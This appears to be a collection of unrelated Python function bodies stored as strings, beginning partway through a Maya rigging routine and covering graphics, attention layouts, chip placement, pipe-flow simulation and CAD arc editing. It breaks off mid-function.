[_pos_end]\n\n\n #Sub handles... 
-----------------------------------------------------------------------------------\n log.debug(\"|{0}| >> Mid Handle creation...\".format(_str_func))\n ml_aimGroups = []\n ml_midHandles = []\n ml_midLoftHandles = []\n for i,p in enumerate(_l_posMid[1:-1]):\n log.debug(\"|{0}| >> mid handle cnt: {1} | p: {2}\".format(_str_func,i,p))\n crv = CURVES.create_fromName('sphere2', [_size_handle,_size_handle,.2* _size_handle], direction = 'y+',baseSize=1)\n mHandle = cgmMeta.validateObjArg(crv, 'cgmObject', setClass=True)\n\n self.copyAttrTo('cgmName',mHandle.mNode,'cgmName',driven='target')\n mHandle.doStore('cgmType','formHandle')\n mHandle.doStore('cgmNameModifier',\"form_{0}\".format(i+1))\n mHandle.doName() \n\n _short = mHandle.mNode\n ml_midHandles.append(mHandle)\n mHandle.p_position = p\n\n mHandle.p_parent = mFormNull\n #mHandle.resetAttrs()\n\n mHandleFactory.setHandle(mHandle.mNode)\n mLoftCurve = mHandleFactory.rebuildAsLoftTarget('loft' + _l_loftShapes[i+1][0].capitalize() + ''.join(_l_loftShapes[i+1][1:]),#_loftShape,\n _size_loft,\n shapeDirection = 'z+',rebuildHandle = False)\n #mc.makeIdentity(mHandle.mNode,a=True, s = True)#...must freeze scale once we're back parented and positioned\n ml_midLoftHandles.append(mLoftCurve)\n\n mTransformedGroup = mHandle.getMessageAsMeta('transformedGroup')\n if not mTransformedGroup:\n mTransformedGroup = mHandle.doGroup(True,True,asMeta=True,typeModifier = 'transformed')\n #mGroup = mHandle.doGroup(True,True,asMeta=True,typeModifier = 'master')\n #mAimGroup = mHandle.doGroup(True,True,asMeta=True,typeModifier = 'aim')\n\n\n _vList = DIST.get_normalizedWeightsByDistance(mTransformedGroup.mNode,\n [ml_handles[0].mNode,ml_handles[-1].mNode])\n\n #_scale = mc.scaleConstraint([ml_handles[0].mNode,ml_handles[-1].mNode],\n # mTransformedGroup.mNode,maintainOffset = False)\n \n BLOCKSHAPES.attachToCurve(mHandle, mMidTrackCurve, parentTo = mNoTransformNull, trackLink='transformedGroup')\n \n #_res_attach = RIGCONSTRAINT.attach_toShape(mTransformedGroup.mNode, mMidTrackCurve.mNode, 'conPoint')\n #TRANS.parent_set(_res_attach[0], mNoTransformNull.mNode)\n\n mTransformedGroup.resetAttrs('rotate')\n\n\n mLoftCurve.p_parent = mFormNull\n mLoftTransformedGroup = mLoftCurve.getMessageAsMeta('transformedGroup')\n if not mLoftTransformedGroup:\n mLoftTransformedGroup = mLoftCurve.doGroup(True,asMeta=True,typeModifier = 'transformed')\n\n #mTransformedGroup = mLoftCurve.doGroup(True,True,asMeta=True,typeModifier = 'transformed')\n #mHandle.doConnectOut('scale', \"{0}.scale\".format(mScaleGroup.mNode))\n mc.scaleConstraint(mHandle.mNode,\n mLoftTransformedGroup.mNode,maintainOffset = False) \n mc.pointConstraint(mHandle.mNode,mLoftTransformedGroup.mNode,maintainOffset=False)\n\n\n #for c in [_scale]:\n #CONSTRAINT.set_weightsByDistance(c[0],_vList)\n\n mHandleFactory = self.asHandleFactory(mHandle.mNode)\n\n CORERIG.colorControl(mHandle.mNode,_side,'main',transparent = True)\n CORERIG.colorControl(mLoftCurve.mNode,_side,'main',transparent = True)\n\n #Push scale back...\n for i,mHandle in enumerate(ml_handles):\n mHandle.scale = l_scales[i]\n\n\n\n #Main Track curve ============================================================================\n ml_handles_chain = [ml_handles[0]] + ml_midHandles + [ml_handles[-1]]\n\n log.debug(\"|{0}| >> Main TrackCrv...\".format(_str_func)) \n _mainTrackResult = CORERIG.create_at([mObj.mNode for mObj in ml_handles_chain],'linearTrack',\n baseName='mainTrack')\n\n mMainTrackCurve = 
cgmMeta.validateObjArg(_mainTrackResult[0],'cgmObject')\n mMainTrackCurve.rename(_baseName+ 'mainHandlesTrack_crv')\n mMainTrackCurve.parent = mNoTransformNull\n\n for s in _mainTrackResult[1]:\n ATTR.set(s[1],'visibility',False) \n\n\n\n log.debug(\"|{0}| >> Aim main handles...\".format(_str_func)+'-'*40) \n\n #AimEndHandle ============================================================================\n log.debug(\"|{0}| >> Aim end...\".format(_str_func)) \n mGroup = md_handles['end'].doGroup(True,True,asMeta=True,typeModifier = 'aim') \n _const = mc.aimConstraint(self.mNode, mGroup.mNode,\n maintainOffset = False,\n aimVector = [0,0,-1],\n upVector = [0,1,0], \n worldUpObject = mRootUpHelper.mNode,\n worldUpType = 'objectrotation', \n worldUpVector = [0,1,0]) \n #mAimGroup = md_handles['end'].doGroup(True, asMeta=True,typeModifier = 'aim')\n #...not doing this now...\n #SNAP.go(md_handles['end'].mNode, self.mNode, position=False)\n\n \"\"\"\n _const = mc.aimConstraint(self.mNode, md_handles['end'].mNode, maintainOffset = False,\n aimVector = [0,0,-1], upVector = [0,1,0], \n worldUpObject = mBaseOrientCurve.mNode,\n worldUpType = 'objectrotation', \n worldUpVector = [0,1,0])\"\"\"\n\n #cgmMeta.cgmNode(_const[0]).doConnectIn('worldUpVector','{0}.baseUp'.format(self.mNode))\n\n\n #AimStartHandle ============================================================================\n log.debug(\"|{0}| >> Aim main handles...\".format(_str_func)) \n mGroup = md_handles['start'].doGroup(True,True,asMeta=True,typeModifier = 'aim') \n _const = mc.aimConstraint(md_handles['end'].mNode, mGroup.mNode,\n maintainOffset = False,\n aimVector = [0,0,1],\n upVector = [0,1,0], \n worldUpObject = mRootUpHelper.mNode,\n worldUpType = 'objectrotation', \n worldUpVector = [0,1,0])\n\n\n\n #>>> Aim Main loft curves ================================================================== \n log.debug(\"|{0}| >> Aim main loft curves...\".format(_str_func)) \n\n\n #Aim the segment -------------------------------------------------------------------------\n \"\"\"\n if _formAim == 'toEnd':\n for i,mHandle in enumerate(ml_handles):\n if mHandle != ml_handles[0] and mHandle != ml_handles[-1]:\n #if i > 0 and i < len(ml_handles) - 1:\n mAimGroup = mHandle.doGroup(True,asMeta=True,typeModifier = 'aim')\n\n mc.aimConstraint(ml_handles[-1].mNode, mAimGroup.mNode, maintainOffset = True, #skip = 'z',\n aimVector = [0,0,1], upVector = [0,1,0], worldUpObject = mBaseOrientCurve.mNode,\n worldUpType = 'objectrotation', worldUpVector = [0,1,0])\n else:#chain\n for i,mHandle in enumerate(ml_handles):\n if mHandle != ml_handles[0] and mHandle != ml_handles[-1]:\n #if i > 0 and i < len(ml_handles) - 1:\n mAimGroup = mHandle.doGroup(True,asMeta=True,typeModifier = 'aim')\n\n mc.aimConstraint(ml_handles[i+1].mNode, mAimGroup.mNode,\n maintainOffset = True,\n aimVector = [0,0,1],\n upVector = [0,1,0],\n worldUpObject = mHandle.masterGroup.mNode,\n worldUpType = 'objectrotation', worldUpVector = [0,1,0])\"\"\"\n\n\n for i,mHandle in enumerate(ml_handles_chain):\n mLoft = mHandle.loftCurve\n _str_handle = mHandle.mNode\n\n mTransformedGroup = mLoft.getMessageAsMeta('transformedGroup')\n if not mTransformedGroup:\n mTransformedGroup = mLoft.doGroup(True,asMeta=True,typeModifier = 'transformed')\n \n mLoft.visibility = 1\n #mLoft.setAttrFlags(['translate'])\n\n for mShape in mLoft.getShapes(asMeta=True):\n mShape.overrideDisplayType = 0\n \n if _formAim == 'orientToHandle':\n mc.orientConstraint([mHandle.mNode],\n mTransformedGroup.mNode, maintainOffset = 
False)\n else:\n _worldUpType = 'objectrotation'\n _worldUpBack = 'objectrotation'\n \n \n _aimBack = None\n _aimForward = None\n _backUpObj = None\n \n if mHandle == ml_handles_chain[0]:\n _aimForward = ml_handles_chain[i+1].mNode\n elif mHandle == ml_handles_chain[-1]:\n if len(ml_handles_chain)>2:\n _aimBack = ml_handles_chain[-2].mNode#md_handles['start'].mNode#ml_handles_chain[].mNode\n else:\n _aimBack = md_handles['start'].mNode\n else:\n _aimForward = ml_handles_chain[i+1].mNode\n _aimBack = ml_handles_chain[i-1].mNode\n \n if _aimBack and md_handles.get('lever'):\n if _aimBack == md_handles.get('lever').mNode:\n _backUpObj = md_handles.get('lever').mNode\n \n if _aimForward and _aimBack is None:\n mc.aimConstraint(_aimForward, mTransformedGroup.mNode, maintainOffset = False,\n aimVector = [0,0,1], upVector = [0,1,0], \n worldUpObject = mBaseOrientCurve.mNode,\n worldUpType = _worldUpType, \n worldUpVector = [0,1,0])\n elif _aimBack and _aimForward is None:\n mc.aimConstraint(_aimBack, mTransformedGroup.mNode, maintainOffset = False,\n aimVector = [0,0,-1], upVector = [0,1,0], \n worldUpObject = mBaseOrientCurve.mNode,\n worldUpType = _worldUpBack, \n worldUpVector = [0,1,0])\n else:\n mAimForward = mLoft.doCreateAt()\n mAimForward.p_parent = mHandle.p_parent#mLoft\n mAimForward.doStore('cgmName',mHandle) \n mAimForward.doStore('cgmTypeModifier','forward')\n mAimForward.doStore('cgmType','aimer')\n mAimForward.doName()\n \n mAimBack = mLoft.doCreateAt()\n mAimBack.p_parent = mHandle.p_parent\n mAimBack.doStore('cgmName',mHandle) \n mAimBack.doStore('cgmTypeModifier','back')\n mAimBack.doStore('cgmType','aimer')\n mAimBack.doName()\n \n mc.aimConstraint(_aimForward, mAimForward.mNode, maintainOffset = False,\n aimVector = [0,0,1], upVector = [0,1,0], \n worldUpObject = mBaseOrientCurve.mNode,\n worldUpType = _worldUpType, \n worldUpVector = [0,1,0])\n \n if _backUpObj == None:\n _backUpObj = mBaseOrientCurve.mNode\n \n mc.aimConstraint(_aimBack, mAimBack.mNode, maintainOffset = False,\n aimVector = [0,0,-1], upVector = [0,1,0], \n worldUpObject = _backUpObj,\n worldUpType = _worldUpType, \n worldUpVector = [0,1,0]) \n \n const = mc.orientConstraint([mAimForward.mNode, mAimBack.mNode],\n mTransformedGroup.mNode, maintainOffset = False)[0]\n \n ATTR.set(const,'interpType',2)#.shortest...\n \n #...also aim our main handles...\n \n if mHandle not in [md_handles['end'],md_handles['start']]:\n log.debug(\"|{0}| >> {2} | Aiming Handle: {1}\".format(_str_func,mHandle,_formAim))\n _aimForward = ml_handles_chain[i+1].mNode\n \n mHandleAimGroup = mHandle.getMessageAsMeta('transformedGroup')\n if not mHandleAimGroup:\n mHandleAimGroup = mHandle.doGroup(True,asMeta=True,typeModifier = 'transformed')\n\n if _formAim == 'toEnd':\n mc.aimConstraint(md_handles['end'].mNode,\n mHandleAimGroup.mNode, maintainOffset = False,\n aimVector = [0,0,1], upVector = [0,1,0], \n worldUpObject = mBaseOrientCurve.mNode,\n worldUpType = 'objectrotation', \n worldUpVector = [0,1,0])\n elif _formAim == 'chain':\n mc.aimConstraint(_aimForward, mHandleAimGroup.mNode, maintainOffset = False,\n aimVector = [0,0,1], upVector = [0,1,0], \n worldUpObject = mBaseOrientCurve.mNode,\n worldUpType = 'objectrotation', \n worldUpVector = [0,1,0])\n\n \"\"\"\n if mHandle in [md_handles['start'],md_handles['end']]:\n _lock = []\n #if mHandle == md_handles['start']:\n # _lock.append('rotate')\n\n ##ATTR.set_alias(mHandle.mNode,'sy','handleScale') \n ##ATTR.set_standardFlags( mHandle.mNode, _lock)\n 
##mHandle.doConnectOut('sy',['sx','sz'])\n #ATTR.set_standardFlags( mHandle.mNode, _lock)\n\n else:\n ATTR.set_standardFlags( mHandle.mNode, ['sz'])\n ATTR.connect('{0}.sy'.format(mHandle.mNode), '{0}.sz'.format(mHandle.mNode))\"\"\"\n\n\n ml_shapers = copy.copy(ml_handles_chain)\n #>>> shaper handles =======================================================================\n if _int_sub or l_numSubShapers:\n _numSubShapers = _int_sub\n ml_shapers = []\n log.debug(\"|{0}| >> Sub shaper handles: {1}\".format(_str_func,_numSubShapers))\n \n\n mOrientHelper = mBaseOrientCurve\n\n log.debug(\"|{0}| >> pairs...\".format(_str_func))\n\n\n ml_handlesToShaper = ml_handles_chain\n ml_shapers = [ml_handlesToShaper[0]]\n\n ml_pairs = LISTS.get_listPairs(ml_handlesToShaper)\n #pprint.pprint(ml_pairs)\n\n\n for i,mPair in enumerate(ml_pairs):\n log.debug(cgmGEN._str_subLine)\n ml_shapersTmp = []\n \n _numSubShapers = l_numSubShapers[i]\n\n _mStart = mPair[0]\n _mEnd = mPair[1]\n _end = _mEnd.mNode\n log.debug(\"|{0}| >> pairs: {1} | end: {2}\".format(_str_func,i,_end))\n\n _pos_start = _mStart.p_position\n _pos_end = _mEnd.p_position \n\n _leverLoftAimMode = False\n\n \n\n _vec = MATH.get_vector_of_two_points(_pos_start, _pos_end)\n _offsetDist = DIST.get_distance_between_points(_pos_start,_pos_end) / (_numSubShapers+1)\n _l_pos_seg = [ DIST.get_pos_by_vec_dist(_pos_start,\n _vec,\n (_offsetDist * ii)) for ii in range(_numSubShapers+1)] + [_pos_end]\n\n _mVectorAim = MATH.get_vector_of_two_points(_pos_start, _pos_end,asEuclid=True)\n #_mVectorUp = _mVectorAim.up()\n #_worldUpVector = [_mVectorUp.x,_mVectorUp.y,_mVectorUp.z] \n\n\n #Linear track curve ----------------------------------------------------------------------\n _linearCurve = mc.curve(d=1,p=[_pos_start,_pos_end])\n mLinearCurve = cgmMeta.validateObjArg(_linearCurve,'cgmObject')\n\n l_clusters = []\n for ii,cv in enumerate(mLinearCurve.getComponents('cv')):\n _res = mc.cluster(cv, n = 'seg_{0}_{1}_cluster'.format(mPair[0].p_nameBase,ii))\n mCluster = cgmMeta.asMeta(_res[1])\n mCluster.p_parent = mFormNull\n mCluster.v = 0\n mc.pointConstraint(mPair[ii].mNode,\n mCluster.mNode,maintainOffset=True)\n l_clusters.append(_res)\n\n mLinearCurve.parent = mNoTransformNull\n mLinearCurve.rename('seg_{0}_trackCrv'.format(i))\n\n\n\n #Tmp loft mesh -------------------------------------------------------------------\n _l_targets = [mObj.loftCurve.mNode for mObj in mPair]\n log.debug(_l_targets)\n _res_body = mc.loft(_l_targets, o = True, d = 3, po = 0 )\n _str_tmpMesh =_res_body[0]\n\n l_scales_seg = []\n\n #Sub handles... 
--------------------------------------------------------------------------\n for ii,p in enumerate(_l_pos_seg[1:-1]):\n #mHandle = mHandleFactory.buildBaseShape('circle', _size, shapeDirection = 'y+')\n mHandle = cgmMeta.cgmObject(name = 'subHandle_{0}_{1}'.format(i,ii))\n _short = mHandle.mNode\n ml_handles.append(mHandle)\n mHandle.p_position = p\n if _leverLoftAimMode:\n SNAP.aim_atPoint(_short,_l_pos_seg[ii+2],'z+', 'y+', mode='vector',\n vectorUp = _mVectorLeverUp)\n else:\n SNAP.aim_atPoint(_short,_l_pos_seg[ii+2],'z+', 'y+', mode='vector', vectorUp = _mVectorUp)\n\n #...Make our curve\n _d = RAYS.cast(_str_tmpMesh, _short, 'x+')\n #pprint.pprint(_d)\n log.debug(\"|{0}| >> Casting {1} ...\".format(_str_func,_short))\n cgmGEN.log_info_dict(_d)\n _v = _d['uvs'][_str_tmpMesh][0][0]\n log.debug(\"|{0}| >> v: {1} ...\".format(_str_func,_v))\n\n #>>For each v value, make a new curve ----------------------------------------------------------------- \n #duplicateCurve -ch 1 -rn 0 -local 0 \"loftedSurface2.u[0.724977270271534]\"\n _crv = mc.duplicateCurve(\"{0}.u[{1}]\".format(_str_tmpMesh,_v), ch = 0, rn = 0, local = 0)\n log.debug(\"|{0}| >> created: {1} ...\".format(_str_func,_crv)) \n\n CORERIG.shapeParent_in_place(_short, _crv, False)\n\n #self.copyAttrTo(_baseNameAttrs[1],mHandle.mNode,'cgmName',driven='target')\n self.copyAttrTo('cgmName',mHandle.mNode,'cgmName',driven='target')\n mHandle.doStore('cgmNameModifier','form_{0}_sub_{1}'.format(i,ii))\n mHandle.doStore('cgmType','shapeHandle')\n mHandle.doName()\n\n mHandle.p_parent = mFormNull\n\n mGroup = mHandle.doGroup(True,True,asMeta=True,typeModifier = 'master')\n mGroup.p_parent = mFormNull\n\n _vList = DIST.get_normalizedWeightsByDistance(mGroup.mNode,[mPair[0].mNode,mPair[1].mNode])\n\n\n if _leverLoftAimMode:\n upObj = md_handles['lever'].mNode\n else:\n upObj = mBaseOrientCurve.mNode\n\n\n\n \n BLOCKSHAPES.attachToCurve(mHandle, mLinearCurve, parentTo = mNoTransformNull, trackLink='masterGroup')\n \"\"\"\n _res_attach = RIGCONSTRAINT.attach_toShape(mGroup.mNode, \n mLinearCurve.mNode,\n 'conPoint')\n TRANS.parent_set(_res_attach[0], mNoTransformNull.mNode)\"\"\"\n # Has to be after the bind\n _scale = mc.scaleConstraint([mPair[0].mNode,mPair[1].mNode],mGroup.mNode,maintainOffset = False)#Point contraint loc to the object\n\n for c in [_scale]:\n CONSTRAINT.set_weightsByDistance(c[0],_vList)\n \n mc.aimConstraint([_end], mGroup.mNode, maintainOffset = False, #skip = 'z',\n aimVector = [0,0,1], upVector = [0,1,0],\n worldUpObject = upObj,\n worldUpType = 'objectrotation', worldUpVector = [0,1,0]) \n\n #Convert to loft curve setup ----------------------------------------------------\n mHandleFactory = self.asHandleFactory(mHandle.mNode)\n #mHandleFactory.rebuildAsLoftTarget('self', None, shapeDirection = 'z+')\n mHandle.doStore('loftCurve',mHandle)\n\n \n CORERIG.colorControl(mHandle.mNode,_side,'sub',transparent = True) \n #LOC.create(position = p)\n ml_shapers.append(mHandle)\n ml_shapersTmp.append(mHandle)\n\n\n ml_shapers.append(mPair[1])\n mc.delete(_res_body)\n\n _mStart.msgList_connect('subShapers',[mObj.mNode for mObj in ml_shapersTmp]) \n\n #Push scale back...\n #for mHandle in mPair:\n #mHandle.scale = l_scales_seg[i]\n\n #Form Loft Mesh -------------------------------------\n #mFormLoft = self.getMessage('formLoftMesh',asMeta=True)[0] \n #for s in mFormLoft.getShapes(asMeta=True):\n #s.overrideDisplayType = 1 \n\n\n #Aim the segment\n \"\"\"\n for ii,mHandle in enumerate(ml_shapersTmp):\n mAimGroup = 
mHandle.doGroup(True,asMeta=True,typeModifier = 'aim')\n log.debug(\"|{0}| >> seg constrain: {1} {2} | end: {3}\".format(_str_func,i,ii,_end))\n\n mc.aimConstraint([_end], mAimGroup.mNode, maintainOffset = True, #skip = 'z',\n aimVector = [0,0,1], upVector = [0,1,0],\n worldUpObject = mBaseOrientCurve.mNode,\n worldUpType = 'objectrotation', worldUpVector = [0,1,0])\"\"\" \n \n \n controller_wireHandles(self,ml_handles + ml_shapers,'form')\n controller_walkChain(self,ml_handles_chain,'form')\n \n \"\"\"\n ml_done = []\n if cgmGEN.__mayaVersion__ >= 2018:\n \n for mHandle in ml_handles + ml_shapers:\n if mHandle in ml_done:\n continue\n if not mHandle:\n continue\n mLoft = mHandle.getMessageAsMeta('loftCurve')\n if mLoft:\n mLoft = cgmMeta.controller_get(mLoft)\n mLoft.visibilityMode = 2\n ml_done.append(mLoft)\n mController = cgmMeta.controller_get(mHandle)\n mController.visibilityMode = 2 \n ml_done.append(mController)\n \n \n \n for mObj in ml_done:\n try:\n ATTR.connect(\"{0}.visProximityMode\".format(self.mNode),\n \"{0}.visibilityMode\".format(mObj.mNode)) \n except Exception,err:\n log.error(err)\n\n self.msgList_append('formStuff',mObj)\n \"\"\"\n return md_handles,ml_handles,ml_shapers,ml_handles_chain", "def StretchBlit(*args, **kwargs):\n return _gdi_.DC_StretchBlit(*args, **kwargs)", "def __init__(self,\n num_heads=8,\n seq_len=1024,\n block=16,\n different_layout_per_head=False):\n super().__init__(num_heads, seq_len, block, different_layout_per_head)\n self.make_layout()", "def pick_berries(deli):\n bridge = make_empty_queue()\n field = make_empty_queue()\n\n total_weight = 0\n bridge_is_broken = False\n max_goats = 15\n max_weight = 1200\n\n while not bridge_is_broken and not empty_stack(deli):\n if bridge.size == max_goats:\n goat = dequeue(bridge)\n print(\"The bridge is full.\", goat.name,\n \"finishes crossing it...\")\n enqueue(field, goat)\n total_weight -= goat.weight\n\n goat = pop(deli)\n\n print(goat.name, \"of weight\", goat.weight,\n \"steps onto the bridge.\")\n enqueue(bridge, goat)\n total_weight += goat.weight\n print(\"Total weight on bridge:\", total_weight)\n print(\"Number of goats on the bridge:\", bridge.size)\n\n if total_weight > max_weight:\n print(\"OH NO! Fat goats broke the bridge!\")\n bridge_is_broken = True\n\n if bridge_is_broken:\n while not empty_queue(bridge):\n croc_food = dequeue(bridge)\n print(croc_food.name,\n \"falls into the water below!\")\n\n while not empty_stack(deli):\n starving = pop(deli)\n print(starving.name, \"is trapped inside the deli!\")\n else:\n while not empty_queue(bridge):\n goat = dequeue(bridge)\n print(goat.name, \"finishes crossing the bridge...\")\n enqueue(field, goat)\n\n print(field.size, \"goat/s successfully picking berries!\")", "def __init__(\n self,\n node_size_x,\n node_size_y,\n bin_center_x,\n bin_center_y,\n target_density,\n xl,\n yl,\n xh,\n yh,\n bin_size_x,\n bin_size_y,\n num_movable_nodes,\n num_terminals,\n num_filler_nodes,\n padding,\n deterministic_flag, # control whether to use deterministic routine\n sorted_node_map,\n movable_macro_mask=None,\n fast_mode=False,\n region_id=None,\n fence_regions=None, # [n_subregion, 4] as dummy macros added to initial density. 
(xl,yl,xh,yh) rectangles\n node2fence_region_map=None,\n placedb=None\n ):\n\n if(region_id is not None):\n ### reconstruct data structure\n num_nodes = placedb.num_nodes\n if(region_id < len(placedb.regions)):\n self.fence_region_mask = node2fence_region_map[:num_movable_nodes] == region_id\n else:\n self.fence_region_mask = node2fence_region_map[:num_movable_nodes] >= len(placedb.regions)\n\n node_size_x = torch.cat([node_size_x[:num_movable_nodes][self.fence_region_mask],\n node_size_x[num_movable_nodes:num_nodes-num_filler_nodes],\n node_size_x[num_nodes-num_filler_nodes+placedb.filler_start_map[region_id]:num_nodes-num_filler_nodes+placedb.filler_start_map[region_id+1]]], 0)\n node_size_y = torch.cat([node_size_y[:num_movable_nodes][self.fence_region_mask],\n node_size_y[num_movable_nodes:num_nodes-num_filler_nodes],\n node_size_y[num_nodes-num_filler_nodes+placedb.filler_start_map[region_id]:num_nodes-num_filler_nodes+placedb.filler_start_map[region_id+1]]], 0)\n\n num_movable_nodes = (self.fence_region_mask).long().sum().item()\n num_filler_nodes = placedb.filler_start_map[region_id+1]-placedb.filler_start_map[region_id]\n if(movable_macro_mask is not None):\n movable_macro_mask = movable_macro_mask[self.fence_region_mask]\n ## sorted cell is recomputed\n sorted_node_map = torch.sort(node_size_x[:num_movable_nodes])[1].to(torch.int32)\n ## make pos mask for fast forward\n self.pos_mask = torch.zeros(2, placedb.num_nodes, dtype=torch.bool, device=node_size_x.device)\n self.pos_mask[0,:placedb.num_movable_nodes].masked_fill_(self.fence_region_mask, 1)\n self.pos_mask[1,:placedb.num_movable_nodes].masked_fill_(self.fence_region_mask, 1)\n self.pos_mask[:,placedb.num_movable_nodes:placedb.num_nodes-placedb.num_filler_nodes] = 1\n self.pos_mask[:,placedb.num_nodes-placedb.num_filler_nodes+placedb.filler_start_map[region_id]:placedb.num_nodes-placedb.num_filler_nodes+placedb.filler_start_map[region_id+1]] = 1\n self.pos_mask = self.pos_mask.view(-1)\n\n super(ElectricPotential,\n self).__init__(node_size_x=node_size_x,\n node_size_y=node_size_y,\n bin_center_x=bin_center_x,\n bin_center_y=bin_center_y,\n target_density=target_density,\n xl=xl,\n yl=yl,\n xh=xh,\n yh=yh,\n bin_size_x=bin_size_x,\n bin_size_y=bin_size_y,\n num_movable_nodes=num_movable_nodes,\n num_terminals=num_terminals,\n num_filler_nodes=num_filler_nodes,\n padding=padding,\n deterministic_flag=deterministic_flag,\n sorted_node_map=sorted_node_map,\n movable_macro_mask=movable_macro_mask)\n self.fast_mode = fast_mode\n self.fence_regions = fence_regions\n self.node2fence_region_map = node2fence_region_map\n self.placedb = placedb\n self.target_density = target_density\n self.region_id = region_id\n ## set by build_density_op func\n self.filler_start_map = None\n self.filler_beg = None\n self.filler_end = None", "def setup():\n size(800, 600)\n stroke_weight(3)", "def trans_setup():\n # slot7 slot6 slot5 slot4 slot3 slot2 slot1 <------ beam direction (slot 8 is currently B-fiber only)\n # Be Be Be Be Be Be Be lens material\n # 1.5 1.5 0.5 0.5 0.5 0.5 0.5 lens radius [mm]\n # 1 1 5 8 4 2 1 number of lenses\n lens_R=[0.5,0.5,0.5,0.5,0.5,1.5,1.5]\n lens_mat=['Be','Be','Be','Be','Be','Be','Be']\n lens_N=[1,2,4,8,5,1,1]\n trans_pos=[35.2,35.8]\n return {'lens_material':lens_mat,'lens_number':lens_N,'lens_radius':lens_R,'trans_position':trans_pos}", "def glow_boundary(bound):\n assert bound < 4\n global layout\n temp = len(layout) - 1\n for i in range(bound, bound + len_square(bound)):\n for j in range(bound, bound + 
len_square(bound)): # TODO: assign this to a variable\t\n layout[i][j] = 1", "def left_boundary(linkp, pn, H, V, H0, V0, links2, p, pump, valve, dt,\n H20, V20, utype, dtype,\n friction, dVdt, dVdx, dVdt20, dVdx20) :\n\n link2 = [p[abs(i)-1] for i in links2]\n # Properties of current pipe\n f = linkp.roughness # unitless\n D = linkp.diameter # m\n g = 9.8 # m/s^2\n a = linkp.wavev # m/s\n n = linkp.number_of_segments # spatial discretization\n KD = linkp.roughness_height\n\n # inner nodes\n if friction == 'steady':\n H[1:-1], V[1:-1] = inner_node_steady(linkp, H0, V0, dt, g)\n elif friction == 'quasi-steady':\n H[1:-1], V[1:-1] = inner_node_quasisteady(linkp, H0, V0, dt, g)\n else:\n H[1:-1], V[1:-1] = inner_node_unsteady(linkp, H0, V0, dt, g,\n dVdx, dVdt)\n\n # Pipe start (outer boundayr conditions)\n V2 = V0[1]; H2 = H0[1]\n dVdx2 = dVdx[0]; dVdt2= dVdt[1]\n if utype[0] == 'Reservoir' or utype[0] == 'Tank':\n H[0], V[0] = rev_end (H2, V2, H[0], 0, a, g, f, D, dt,\n KD, friction, dVdx2, dVdt2)\n elif utype[0] == 'Valve':\n H[0], V[0] = valve_end (H2, V2, V[0], 0, a, g, f, D, dt,\n KD, friction, dVdx2, dVdt2)\n elif utype[0] == 'Junction':\n elev = linkp.start_node.elevation\n H[0], V[0] = dead_end (linkp , H2, V2, elev, 0, a, g, f, D, dt,\n KD, friction, dVdx2, dVdt2)\n elif utype[0] == 'Pump': #source pump\n H[0], V[0] = source_pump(pump[0], linkp, H2, V2, dt, g, [-1],\n friction, dVdx2, dVdt2)\n\n # Pipe end (inner boundary conditions)\n V1 = V0[n-1]; H1 = H0[n-1] # upstream node\n V2 = V20; H2 = H20 # downstream nodes\n dVdx1 = dVdx[n-1] ; dVdx2 = dVdx20\n dVdt1 = dVdt[n-1] ; dVdt2 = dVdt20\n\n if dtype[0] == 'Pipe':\n if linkp.end_node.transient_node_type == 'SurgeTank':\n shape = linkp.end_node.tank_shape\n H[n], V[n], Qs = surge_tank(shape, linkp, link2,\n H1, V1, H2, V2, dt, g, n, [1], np.sign(links2),\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n linkp.end_node.water_level = H[n]\n linkp.end_node.tank_flow = Qs\n\n elif linkp.end_node.transient_node_type == 'Chamber':\n shape = linkp.end_node.tank_shape\n H[n], V[n], Qs, zp = air_chamber(shape, linkp, link2,\n H1, V1, H2, V2, dt, g, n, [1], np.sign(links2),\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n linkp.end_node.water_level = zp\n linkp.end_node.tank_flow = Qs\n else:\n elev = linkp.end_node.elevation\n emitter_coeff = linkp.end_node.emitter_coeff + linkp.end_node.demand_coeff\n block_per = linkp.end_node.block_per\n H[n], V[n] = add_leakage(emitter_coeff, block_per,linkp, link2, elev,\n H1, V1, H2, V2, dt, g, n, [1], np.sign(links2),\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n\n elif dtype[0] == 'Pump':\n pumpc = pump[1]\n H[n], V[n] = pump_node(pumpc, linkp, link2,\n H1, V1, H2, V2, dt, g, n, [1], np.sign(links2),\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n\n elif dtype[0] == 'Valve':\n valvec = valve[1]\n if links2 == []:\n H[n], V[n] = valve_end (H1, V1, V[n], n, a, g, f, D, dt,\n KD, friction, dVdx1, dVdt1)\n else:\n H[n], V[n] = valve_node(valvec, linkp, link2,\n H1, V1, H2, V2, dt, g, n, [1], np.sign(links2),\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n\n elif dtype[0] == 'Junction':\n elev = linkp.end_node.elevation\n H[n], V[n] = dead_end (linkp, H1, V1, elev, n, a, g, f, D, dt,\n KD, friction, dVdx1, dVdt1)\n\n return H, V", "def gripStretchArc(arc, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve, inverseArc = None):\n startPt = arc.getStartPt()\n endPt = arc.getEndPt()\n middlePt = arc.getMiddlePt()\n newStartPt = QgsPoint(startPt)\n newEndPt = QgsPoint(endPt)\n newMiddlePt = QgsPoint(middlePt)\n newCenter = None\n 
startPtChanged = endPtChanged = middlePtPtChanged = False\n for ptToStretch in ptListToStretch:\n if qad_utils.ptNear(ptToStretch, arc.center): # se i punti sono sufficientemente vicini\n newCenter = QgsPoint(arc.center.x() + offSetX, arc.center.y() + offSetY)\n else:\n if qad_utils.ptNear(startPt, ptToStretch):\n newStartPt.set(startPt.x() + offSetX, startPt.y() + offSetY)\n startPtChanged = True\n elif qad_utils.ptNear(endPt, ptToStretch):\n newEndPt.set(endPt.x() + offSetX, endPt.y() + offSetY)\n endPtChanged = True\n elif qad_utils.ptNear(middlePt, ptToStretch):\n newMiddlePt.set(middlePt.x() + offSetX, middlePt.y() + offSetY)\n middlePtPtChanged = True\n \n newArc = qad_arc.QadArc()\n if newArc.fromStartSecondEndPts(newStartPt, newMiddlePt, newEndPt) == False:\n return None\n \n # se il centro era nei punti di grip\n if newCenter is not None:\n # se i tre punti dell'arco erano nei punti di grip oppure\n # allora non cambio il centro\n if (startPtChanged and endPtChanged and middlePtPtChanged):\n pass\n else:\n newArc.center.set(newCenter.x(), newCenter.y())\n \n if inverseArc is not None: # se l'arco faceva parte di una linestring\n # verifico il verso del nuovo arco\n if qad_utils.ptNear(newStartPt, 